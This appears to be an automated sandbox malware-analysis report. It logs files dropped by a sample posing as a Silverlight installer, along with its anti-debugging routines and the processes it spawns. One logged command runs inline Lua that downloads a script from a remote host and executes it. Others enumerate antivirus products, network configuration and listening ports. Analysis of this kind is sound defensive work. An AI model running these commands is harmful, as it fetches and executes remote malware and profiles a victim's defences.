Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\lua\lua.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\cli.exe	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\libcrypto-1_1-x64.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\psutil\_psutil_windows.cp37-win_amd64.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axcontrol\axcontrol.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Dropped PE file which has not been started: C:\ProgramData\lua\mime\core.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\authorization\authorization.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\isapi\PyISAPI_loader.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Dropped PE file which has not been started: C:\ProgramData\lua\lua51.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\gui.exe	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\gui-32.exe	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\bindings\_openssl.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\cli-64.exe	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\adsi\adsi.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Dropped PE file which has not been started: C:\ProgramData\lua\alien\core.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\pywin32_system32\pywintypes37.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\lua\ScheduleTask.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\gui-64.exe	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\API-MS-Win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Dropped PE file which has not been started: C:\ProgramData\lua\zip.dll	Jump to dropped file
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Dropped PE file which has not been started: C:\ProgramData\lua\socket\core.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\libssl-1_1-x64.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\DefaultPack[1].EXE	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\pywin32_system32\pythoncom37.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\cli-32.exe	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axscript\axscript.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\bindings\_padding.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\win32comext\axdebug\axdebug.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\ProgramData\lua\lua.exe	Dropped PE file which has not been started: C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Cipher\_raw_des.pyd	Jump to dropped file

Source: C:\ProgramData\lua\luac.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\Silverlight.exe	Code function: 6_2_01004353 SendDlgItemMessageA,strstr,SetFileAttributesA,GetLastError,CopyFileA,SendDlgItemMessageA,strstr,SetFileAttributesA,CopyFileA,GetLastError,CopyFileA,SetFileAttributesA,SendDlgItemMessageA,_strlwr,GetLastError,MoveFileA,MoveFileA,_strlwr,strstr,FindFirstFileA,strrchr,SendDlgItemMessageA,DeleteFileA,Sleep,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,strrchr,SendDlgItemMessageA,	6_2_01004353
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: 11_2_010938F0 ExpandEnvironmentStringsW,_wcscpy_s,_wcscpy_s,_wcscat_s,FindFirstFileW,_wcscpy_s,WaitForSingleObject,_wcscpy_s,_wcscat_s,ShellExecuteExW,WaitForSingleObject,	11_2_010938F0
Source: C:\Windows\Installer\MSIE4C1.tmp	Code function: 24_2_00C32540 LoadLibraryW,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,_wcscpy_s,_wcscat_s,FindFirstFileW,	24_2_00C32540
Source: C:\Windows\Installer\MSIE4C1.tmp	Code function: 24_2_00C326F0 ExpandEnvironmentStringsW,_wcscpy_s,_wcscat_s,MoveFileExW,_wcscpy_s,_wcscat_s,_wcscat_s,_wcscat_s,FindFirstFileW,_wcscpy_s,_wcscat_s,_wcscat_s,MoveFileExW,FindNextFileW,GetLastError,	24_2_00C326F0

Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe

Code function: 1_2_00007FF7BF6785A0 GetSystemInfo,WakeAllConditionVariable,AddVectoredExceptionHandler,RtlAddVectoredContinueHandler,SetThreadStackGuarantee,GetLastError,GetProcessHeap,HeapAlloc,

1_2_00007FF7BF6785A0

Source: WMIC.exe, 00000015.00000002.257579684.0000000003340000.00000002.00000001.sdmp, WMIC.exe, 00000017.00000002.268635481.0000000002EF0000.00000002.00000001.sdmp, WMIC.exe, 00000023.00000002.312015385.0000000003B80000.00000002.00000001.sdmp, WMIC.exe, 0000002B.00000002.340283858.0000000003B10000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WMIC.exe, 00000015.00000002.257579684.0000000003340000.00000002.00000001.sdmp, WMIC.exe, 00000017.00000002.268635481.0000000002EF0000.00000002.00000001.sdmp, WMIC.exe, 00000023.00000002.312015385.0000000003B80000.00000002.00000001.sdmp, WMIC.exe, 0000002B.00000002.340283858.0000000003B10000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WMIC.exe, 00000015.00000002.257579684.0000000003340000.00000002.00000001.sdmp, WMIC.exe, 00000017.00000002.268635481.0000000002EF0000.00000002.00000001.sdmp, WMIC.exe, 00000023.00000002.312015385.0000000003B80000.00000002.00000001.sdmp, WMIC.exe, 0000002B.00000002.340283858.0000000003B10000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WhQZ6UbCEY.exe, 00000001.00000002.230354186.00000246AF9D8000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: WMIC.exe, 00000015.00000002.257579684.0000000003340000.00000002.00000001.sdmp, WMIC.exe, 00000017.00000002.268635481.0000000002EF0000.00000002.00000001.sdmp, WMIC.exe, 00000023.00000002.312015385.0000000003B80000.00000002.00000001.sdmp, WMIC.exe, 0000002B.00000002.340283858.0000000003B10000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\5a70dbc53fcf0baade86ff\install.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\ProgramData\lua\luac.exe

Code function: 3_2_004022C2 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,

3_2_004022C2

Source: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe

Code function: 19_2_00229EE3 EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

19_2_00229EE3

Source: C:\Users\user\AppData\Roaming\Silverlight.exe

Code function: 6_2_01002838 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

6_2_01002838

Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe

Code function: 1_2_00007FF7BF7298D0 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,WSAStartup,WSACleanup,

1_2_00007FF7BF7298D0

Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process token adjusted: Debug

Source: C:\ProgramData\lua\luac.exe	Code function: 3_2_004022C2 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	3_2_004022C2
Source: C:\ProgramData\lua\luac.exe	Code function: 3_2_00402403 SetUnhandledExceptionFilter,	3_2_00402403
Source: C:\ProgramData\lua\luac.exe	Code function: 3_2_00A245A4 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	3_2_00A245A4
Source: C:\Users\user\AppData\Roaming\Silverlight.exe	Code function: 6_2_01005C72 SetUnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_01005C72
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: 11_2_0109DC28 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_0109DC28
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: 11_2_0109BC48 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_0109BC48
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: 11_2_010A1ED0 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_010A1ED0
Source: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe	Code function: 19_2_00228238 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_00228238
Source: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe	Code function: 19_2_00228215 SetUnhandledExceptionFilter,	19_2_00228215
Source: C:\Windows\Installer\MSIE4C1.tmp	Code function: 24_2_00C3A60E _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_00C3A60E
Source: C:\Windows\Installer\MSIE4C1.tmp	Code function: 24_2_00C329F7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	24_2_00C329F7
Source: C:\Windows\Installer\MSIE4C1.tmp	Code function: 24_2_00C32F0A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	24_2_00C32F0A
Source: C:\Windows\Installer\MSIE4C1.tmp	Code function: 24_2_00C33F15 SetUnhandledExceptionFilter,	24_2_00C33F15
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe	Code function: 31_2_010245E5 SetUnhandledExceptionFilter,	31_2_010245E5
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe	Code function: 31_2_01023C90 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	31_2_01023C90
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe	Code function: 31_2_0102629E _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_0102629E
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: 36_2_00CF43FA _raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	36_2_00CF43FA
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: 36_2_00CF1D6F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	36_2_00CF1D6F
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: 36_2_00CF0657 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	36_2_00CF0657
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: 36_2_00CF37DB SetUnhandledExceptionFilter,	36_2_00CF37DB

Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe

Code function: 36_2_00CED090 ShellExecuteW,GetModuleFileNameW,ShellExecuteExW,

36_2_00CED090

Source: C:\ProgramData\lua\luac.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c netstat -ano\|findstr LISTEN\|findstr 127.0.0.1:	Jump to behavior
Source: C:\ProgramData\lua\luac.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c netstat -ano\|findstr LISTEN\|findstr 127.0.0.1:	Jump to behavior
Source: C:\ProgramData\lua\luac.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName && WMIC os get caption && ipconfig /all	Jump to behavior
Source: C:\ProgramData\lua\luac.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName && WMIC os get caption && ipconfig /all	Jump to behavior
Source: C:\ProgramData\lua\luac.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C %ProgramData%\lua\lua.exe -e 'local code = [[local http = require('socket.http');local response_body = {};local res, code = http.request({url = 'http://lualibs.oss-cn-hongkong.aliyuncs.com/x86/Schedule.lua',sink = ltn12.sink.table(response_body)});if type(response_body) == 'table' then loadstring(table.concat(response_body))() else print('error') end;]];loadstring(code)();'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -ano	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr LISTEN	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr 127.0.0.1:	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe 'C:\5a70dbc53fcf0baade86ff\microsoft_defaults.exe' dhp=true dsp=true	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' 'C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\SLMSPRBootstrap.dll',SetupPlayReadyData	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe 'C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe' mscorlib.dll	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe 'C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\silverlight.configuration.exe' -enableMU	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: unknown unknown	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: unknown unknown	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: unknown unknown	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: unknown unknown	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: unknown unknown	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: unknown unknown	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: unknown unknown	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: unknown unknown	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: unknown unknown	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: unknown unknown	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: unknown unknown	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: unknown unknown	Jump to behavior
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: unknown unknown	Jump to behavior
